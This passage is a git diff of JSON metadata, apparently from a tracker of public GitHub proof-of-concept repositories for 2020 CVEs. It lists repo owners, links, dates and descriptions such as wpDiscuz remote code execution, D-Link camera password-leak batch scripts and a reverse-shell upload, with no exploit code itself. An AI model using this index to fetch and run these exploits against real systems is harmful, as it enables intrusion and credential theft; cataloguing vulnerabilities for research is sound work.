+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-24029.json b/2020/CVE-2020-24029.json
index 1f11cdbe19..df9d8d2057 100644
--- a/2020/CVE-2020-24029.json
+++ b/2020/CVE-2020-24029.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 427767969,
+ "name": "CVE-2020-24029",
+ "full_name": "redteambrasil\/CVE-2020-24029",
+ "owner": {
+ "login": "redteambrasil",
+ "id": 24315084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4",
+ "html_url": "https:\/\/github.com\/redteambrasil"
+ },
+ "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2020-24029",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-13T20:39:59Z",
+ "updated_at": "2021-11-13T20:40:16Z",
+ "pushed_at": "2021-11-13T20:40:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-24030.json b/2020/CVE-2020-24030.json
index 8a72d50d7d..60f07b9439 100644
--- a/2020/CVE-2020-24030.json
+++ b/2020/CVE-2020-24030.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 427768343,
+ "name": "CVE-2020-24030",
+ "full_name": "redteambrasil\/CVE-2020-24030",
+ "owner": {
+ "login": "redteambrasil",
+ "id": 24315084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4",
+ "html_url": "https:\/\/github.com\/redteambrasil"
+ },
+ "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2020-24030",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-13T20:42:31Z",
+ "updated_at": "2021-11-13T20:43:06Z",
+ "pushed_at": "2021-11-13T20:43:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-24032.json b/2020/CVE-2020-24032.json
new file mode 100644
index 0000000000..bae32e94da
--- /dev/null
+++ b/2020/CVE-2020-24032.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 331558019,
+ "name": "CVE-2020-24032",
+ "full_name": "jet-pentest\/CVE-2020-24032",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-24032",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-21T08:07:09Z",
+ "updated_at": "2021-02-14T09:24:10Z",
+ "pushed_at": "2021-01-21T08:08:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-24148.json b/2020/CVE-2020-24148.json
new file mode 100644
index 0000000000..8819e28698
--- /dev/null
+++ b/2020/CVE-2020-24148.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 385097703,
+ "name": "CVE-2020-24148",
+ "full_name": "dwisiswant0\/CVE-2020-24148",
+ "owner": {
+ "login": "dwisiswant0",
+ "id": 25837540,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4",
+ "html_url": "https:\/\/github.com\/dwisiswant0"
+ },
+ "html_url": "https:\/\/github.com\/dwisiswant0\/CVE-2020-24148",
+ "description": "CVE-2020-24148 Proof-of-Concept",
+ "fork": false,
+ "created_at": "2021-07-12T02:01:26Z",
+ "updated_at": "2023-12-04T18:12:20Z",
+ "pushed_at": "2021-07-12T02:25:14Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-24186.json b/2020/CVE-2020-24186.json
index 1803a8fad7..88a61fc99b 100644
--- a/2020/CVE-2020-24186.json
+++ b/2020/CVE-2020-24186.json
@@ -1,4 +1,94 @@
[
+ {
+ "id": 376657175,
+ "name": "CVE-2020-24186-wpDiscuz-7.0.4-RCE",
+ "full_name": "hev0x\/CVE-2020-24186-wpDiscuz-7.0.4-RCE",
+ "owner": {
+ "login": "hev0x",
+ "id": 6265911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4",
+ "html_url": "https:\/\/github.com\/hev0x"
+ },
+ "html_url": "https:\/\/github.com\/hev0x\/CVE-2020-24186-wpDiscuz-7.0.4-RCE",
+ "description": "wpDiscuz 7.0.4 Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-06-13T23:10:19Z",
+ "updated_at": "2024-05-15T06:20:49Z",
+ "pushed_at": "2021-06-15T17:30:23Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 395630203,
+ "name": "CVE-2020-24186",
+ "full_name": "meicookies\/CVE-2020-24186",
+ "owner": {
+ "login": "meicookies",
+ "id": 79348524,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79348524?v=4",
+ "html_url": "https:\/\/github.com\/meicookies"
+ },
+ "html_url": "https:\/\/github.com\/meicookies\/CVE-2020-24186",
+ "description": "WpDiscuz 7.0.4 Arbitrary File Upload Exploit",
+ "fork": false,
+ "created_at": "2021-08-13T11:32:47Z",
+ "updated_at": "2021-08-13T11:54:45Z",
+ "pushed_at": "2021-08-13T11:54:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 478040003,
+ "name": "CVE-2020-24186-exploit",
+ "full_name": "Sakura-501\/CVE-2020-24186-exploit",
+ "owner": {
+ "login": "Sakura-501",
+ "id": 71068573,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71068573?v=4",
+ "html_url": "https:\/\/github.com\/Sakura-501"
+ },
+ "html_url": "https:\/\/github.com\/Sakura-501\/CVE-2020-24186-exploit",
+ "description": "CVE-2020-24186的攻击脚本",
+ "fork": false,
+ "created_at": "2022-04-05T08:31:56Z",
+ "updated_at": "2023-09-28T11:37:42Z",
+ "pushed_at": "2022-04-05T08:38:57Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 734528943,
"name": "CVE-2020-24186_reverse_shell_upload",
diff --git a/2020/CVE-2020-24572.json b/2020/CVE-2020-24572.json
index 314b2882df..977445433b 100644
--- a/2020/CVE-2020-24572.json
+++ b/2020/CVE-2020-24572.json
@@ -28,5 +28,35 @@
"watchers": 4,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 353538057,
+ "name": "CVE-2020-24572-POC",
+ "full_name": "gerbsec\/CVE-2020-24572-POC",
+ "owner": {
+ "login": "gerbsec",
+ "id": 67713732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67713732?v=4",
+ "html_url": "https:\/\/github.com\/gerbsec"
+ },
+ "html_url": "https:\/\/github.com\/gerbsec\/CVE-2020-24572-POC",
+ "description": "An issue was discovered in includes\/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS running this software, and execute commands on the system including ones for uploading of files and execution of code.",
+ "fork": false,
+ "created_at": "2021-04-01T01:33:26Z",
+ "updated_at": "2024-01-27T13:10:35Z",
+ "pushed_at": "2021-04-01T01:35:35Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-24656.json b/2020/CVE-2020-24656.json
new file mode 100644
index 0000000000..09f15fab2b
--- /dev/null
+++ b/2020/CVE-2020-24656.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 406340554,
+ "name": "Internet-Security-Project",
+ "full_name": "terzinodipaese\/Internet-Security-Project",
+ "owner": {
+ "login": "terzinodipaese",
+ "id": 30941518,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30941518?v=4",
+ "html_url": "https:\/\/github.com\/terzinodipaese"
+ },
+ "html_url": "https:\/\/github.com\/terzinodipaese\/Internet-Security-Project",
+ "description": "Here you can find my relation about the project I made for the Internet Security course. Because I written it in Latex, you can also find the Latex source files. The project talks about Maltego vulnerability CVE-2020-24656, which allows an attacker to exfiltrate data via an XXE injection attack.",
+ "fork": false,
+ "created_at": "2021-09-14T11:33:12Z",
+ "updated_at": "2021-09-14T11:38:50Z",
+ "pushed_at": "2021-09-14T11:38:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-24949.json b/2020/CVE-2020-24949.json
new file mode 100644
index 0000000000..6f6ceae7b8
--- /dev/null
+++ b/2020/CVE-2020-24949.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 373457880,
+ "name": "CVE-2020-24949",
+ "full_name": "r90tpass\/CVE-2020-24949",
+ "owner": {
+ "login": "r90tpass",
+ "id": 82740056,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82740056?v=4",
+ "html_url": "https:\/\/github.com\/r90tpass"
+ },
+ "html_url": "https:\/\/github.com\/r90tpass\/CVE-2020-24949",
+ "description": "PHPFusion 9.03.50 - Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-06-03T09:49:22Z",
+ "updated_at": "2021-06-03T09:50:31Z",
+ "pushed_at": "2021-06-03T09:50:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-2501.json b/2020/CVE-2020-2501.json
new file mode 100644
index 0000000000..4a73a2dc51
--- /dev/null
+++ b/2020/CVE-2020-2501.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 462035961,
+ "name": "alonzzzo",
+ "full_name": "Alonzozzz\/alonzzzo",
+ "owner": {
+ "login": "Alonzozzz",
+ "id": 100165245,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100165245?v=4",
+ "html_url": "https:\/\/github.com\/Alonzozzz"
+ },
+ "html_url": "https:\/\/github.com\/Alonzozzz\/alonzzzo",
+ "description": "Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H\/W rev. Ax with F\/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1",
+ "fork": false,
+ "created_at": "2022-02-21T21:22:43Z",
+ "updated_at": "2022-02-21T21:22:43Z",
+ "pushed_at": "2022-02-21T21:23:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25078.json b/2020/CVE-2020-25078.json
new file mode 100644
index 0000000000..41674b3f69
--- /dev/null
+++ b/2020/CVE-2020-25078.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 352901213,
+ "name": "CVE-2020-25078",
+ "full_name": "MzzdToT\/CVE-2020-25078",
+ "owner": {
+ "login": "MzzdToT",
+ "id": 44486276,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44486276?v=4",
+ "html_url": "https:\/\/github.com\/MzzdToT"
+ },
+ "html_url": "https:\/\/github.com\/MzzdToT\/CVE-2020-25078",
+ "description": "D-Link DCS系列账号密码信息泄露漏洞,通过脚本获取账号密码,可批量。",
+ "fork": false,
+ "created_at": "2021-03-30T06:57:31Z",
+ "updated_at": "2023-11-18T16:34:11Z",
+ "pushed_at": "2021-03-30T07:10:34Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 357877456,
+ "name": "CVE-2020-25078",
+ "full_name": "S0por\/CVE-2020-25078",
+ "owner": {
+ "login": "S0por",
+ "id": 82497394,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82497394?v=4",
+ "html_url": "https:\/\/github.com\/S0por"
+ },
+ "html_url": "https:\/\/github.com\/S0por\/CVE-2020-25078",
+ "description": "D-Link DCS系列摄像头账号密码信息泄露批量脚本",
+ "fork": false,
+ "created_at": "2021-04-14T11:17:50Z",
+ "updated_at": "2022-11-09T18:11:54Z",
+ "pushed_at": "2021-04-15T09:44:18Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 417501861,
+ "name": "CVE-2020-25078",
+ "full_name": "chinaYozz\/CVE-2020-25078",
+ "owner": {
+ "login": "chinaYozz",
+ "id": 65993068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65993068?v=4",
+ "html_url": "https:\/\/github.com\/chinaYozz"
+ },
+ "html_url": "https:\/\/github.com\/chinaYozz\/CVE-2020-25078",
+ "description": "CVE-2020-25078账号密码信息泄露批量脚本Batch script of D-Link DCS series camera account password information disclosure",
+ "fork": false,
+ "created_at": "2021-10-15T13:03:29Z",
+ "updated_at": "2024-03-12T15:35:10Z",
+ "pushed_at": "2021-10-15T13:40:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25134.json b/2020/CVE-2020-25134.json
new file mode 100644
index 0000000000..1811a8a170
--- /dev/null
+++ b/2020/CVE-2020-25134.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 385486999,
+ "name": "CVE-2020-25134",
+ "full_name": "ynsmroztas\/CVE-2020-25134",
+ "owner": {
+ "login": "ynsmroztas",
+ "id": 58443521,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58443521?v=4",
+ "html_url": "https:\/\/github.com\/ynsmroztas"
+ },
+ "html_url": "https:\/\/github.com\/ynsmroztas\/CVE-2020-25134",
+ "description": "CVE-2020-25134 Authenticated Local File Inclusion in settings\/format",
+ "fork": false,
+ "created_at": "2021-07-13T05:29:30Z",
+ "updated_at": "2021-07-13T05:32:37Z",
+ "pushed_at": "2021-07-13T05:32:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25213.json b/2020/CVE-2020-25213.json
index e269a95ac3..48f9b8fa83 100644
--- a/2020/CVE-2020-25213.json
+++ b/2020/CVE-2020-25213.json
@@ -63,6 +63,96 @@
"score": 0,
"subscribers_count": 0
},
+ {
+ "id": 335841666,
+ "name": "CVE-2020-25213-Wordpress",
+ "full_name": "forse01\/CVE-2020-25213-Wordpress",
+ "owner": {
+ "login": "forse01",
+ "id": 76189258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4",
+ "html_url": "https:\/\/github.com\/forse01"
+ },
+ "html_url": "https:\/\/github.com\/forse01\/CVE-2020-25213-Wordpress",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-04T04:52:06Z",
+ "updated_at": "2023-03-16T01:13:50Z",
+ "pushed_at": "2021-03-05T02:31:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 347219302,
+ "name": "Wordpress-CVE-2020-25213",
+ "full_name": "0000000O0Oo\/Wordpress-CVE-2020-25213",
+ "owner": {
+ "login": "0000000O0Oo",
+ "id": 61102077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61102077?v=4",
+ "html_url": "https:\/\/github.com\/0000000O0Oo"
+ },
+ "html_url": "https:\/\/github.com\/0000000O0Oo\/Wordpress-CVE-2020-25213",
+ "description": "Will write a python script for exploiting this vulnerability ",
+ "fork": false,
+ "created_at": "2021-03-12T22:58:43Z",
+ "updated_at": "2021-03-13T13:15:06Z",
+ "pushed_at": "2021-03-13T13:15:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 354304279,
+ "name": "CVE-2020-25213",
+ "full_name": "piruprohacking\/CVE-2020-25213",
+ "owner": {
+ "login": "piruprohacking",
+ "id": 81864674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81864674?v=4",
+ "html_url": "https:\/\/github.com\/piruprohacking"
+ },
+ "html_url": "https:\/\/github.com\/piruprohacking\/CVE-2020-25213",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-03T13:52:21Z",
+ "updated_at": "2021-04-03T13:53:06Z",
+ "pushed_at": "2021-04-03T13:53:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 495906064,
"name": "CVE-2020-25213",
diff --git a/2020/CVE-2020-25223.json b/2020/CVE-2020-25223.json
new file mode 100644
index 0000000000..1d20e5921a
--- /dev/null
+++ b/2020/CVE-2020-25223.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 401020789,
+ "name": "sophucked",
+ "full_name": "darrenmartyn\/sophucked",
+ "owner": {
+ "login": "darrenmartyn",
+ "id": 49643587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49643587?v=4",
+ "html_url": "https:\/\/github.com\/darrenmartyn"
+ },
+ "html_url": "https:\/\/github.com\/darrenmartyn\/sophucked",
+ "description": "CVE-2020-25223",
+ "fork": false,
+ "created_at": "2021-08-29T11:08:53Z",
+ "updated_at": "2022-05-19T11:27:41Z",
+ "pushed_at": "2021-09-13T21:24:03Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 404784498,
+ "name": "CVE-2020-25223",
+ "full_name": "twentybel0w\/CVE-2020-25223",
+ "owner": {
+ "login": "twentybel0w",
+ "id": 30179317,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30179317?v=4",
+ "html_url": "https:\/\/github.com\/twentybel0w"
+ },
+ "html_url": "https:\/\/github.com\/twentybel0w\/CVE-2020-25223",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-09T15:58:08Z",
+ "updated_at": "2022-04-12T05:57:11Z",
+ "pushed_at": "2021-09-11T18:13:03Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25498.json b/2020/CVE-2020-25498.json
new file mode 100644
index 0000000000..36e2483605
--- /dev/null
+++ b/2020/CVE-2020-25498.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 327073339,
+ "name": "CVE-2020-25498",
+ "full_name": "the-girl-who-lived\/CVE-2020-25498",
+ "owner": {
+ "login": "the-girl-who-lived",
+ "id": 42164898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42164898?v=4",
+ "html_url": "https:\/\/github.com\/the-girl-who-lived"
+ },
+ "html_url": "https:\/\/github.com\/the-girl-who-lived\/CVE-2020-25498",
+ "description": "Stored XSS via CSRF in Beetel 777VR1 Router ",
+ "fork": false,
+ "created_at": "2021-01-05T17:38:52Z",
+ "updated_at": "2021-01-09T06:55:14Z",
+ "pushed_at": "2021-01-05T19:48:06Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-2551.json b/2020/CVE-2020-2551.json
index cd27954eaa..205c4b77db 100644
--- a/2020/CVE-2020-2551.json
+++ b/2020/CVE-2020-2551.json
@@ -229,5 +229,65 @@
"watchers": 0,
"score": 0,
"subscribers_count": 0
+ },
+ {
+ "id": 472179800,
+ "name": "CVE-2020-2551",
+ "full_name": "LTiDi2000\/CVE-2020-2551",
+ "owner": {
+ "login": "LTiDi2000",
+ "id": 68416745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68416745?v=4",
+ "html_url": "https:\/\/github.com\/LTiDi2000"
+ },
+ "html_url": "https:\/\/github.com\/LTiDi2000\/CVE-2020-2551",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-21T03:58:29Z",
+ "updated_at": "2022-03-21T03:58:29Z",
+ "pushed_at": "2022-03-21T03:58:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 499165660,
+ "name": "CVE-Exploit",
+ "full_name": "0xAbbarhSF\/CVE-Exploit",
+ "owner": {
+ "login": "0xAbbarhSF",
+ "id": 67552744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4",
+ "html_url": "https:\/\/github.com\/0xAbbarhSF"
+ },
+ "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-Exploit",
+ "description": "CVE-2020-2551 Exploiter ",
+ "fork": false,
+ "created_at": "2022-06-02T14:20:43Z",
+ "updated_at": "2023-09-30T04:27:57Z",
+ "pushed_at": "2022-06-02T14:23:03Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-25540.json b/2020/CVE-2020-25540.json
index aa6d7adffa..579e57d06e 100644
--- a/2020/CVE-2020-25540.json
+++ b/2020/CVE-2020-25540.json
@@ -28,5 +28,65 @@
"watchers": 6,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 467931258,
+ "name": "ThinkAdmin-CVE-2020-25540",
+ "full_name": "Rajchowdhury420\/ThinkAdmin-CVE-2020-25540",
+ "owner": {
+ "login": "Rajchowdhury420",
+ "id": 30806882,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30806882?v=4",
+ "html_url": "https:\/\/github.com\/Rajchowdhury420"
+ },
+ "html_url": "https:\/\/github.com\/Rajchowdhury420\/ThinkAdmin-CVE-2020-25540",
+ "description": "ThinkAdmin CVE-2020-25540 POC",
+ "fork": false,
+ "created_at": "2022-03-09T13:08:31Z",
+ "updated_at": "2022-07-21T22:35:55Z",
+ "pushed_at": "2022-03-09T13:10:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 490515662,
+ "name": "cve-2020-25540",
+ "full_name": "lowkey0808\/cve-2020-25540",
+ "owner": {
+ "login": "lowkey0808",
+ "id": 49674960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4",
+ "html_url": "https:\/\/github.com\/lowkey0808"
+ },
+ "html_url": "https:\/\/github.com\/lowkey0808\/cve-2020-25540",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-10T02:33:46Z",
+ "updated_at": "2022-05-10T02:47:32Z",
+ "pushed_at": "2022-05-10T02:51:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-2555.json b/2020/CVE-2020-2555.json
index 5a40df8140..5e78485f83 100644
--- a/2020/CVE-2020-2555.json
+++ b/2020/CVE-2020-2555.json
@@ -148,5 +148,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 428192560,
+ "name": "POC_CVE-2020-2555",
+ "full_name": "Qynklee\/POC_CVE-2020-2555",
+ "owner": {
+ "login": "Qynklee",
+ "id": 23394219,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23394219?v=4",
+ "html_url": "https:\/\/github.com\/Qynklee"
+ },
+ "html_url": "https:\/\/github.com\/Qynklee\/POC_CVE-2020-2555",
+ "description": "poc for CVE-2020-2555",
+ "fork": false,
+ "created_at": "2021-11-15T09:06:42Z",
+ "updated_at": "2023-12-13T14:06:34Z",
+ "pushed_at": "2021-11-15T09:16:25Z",
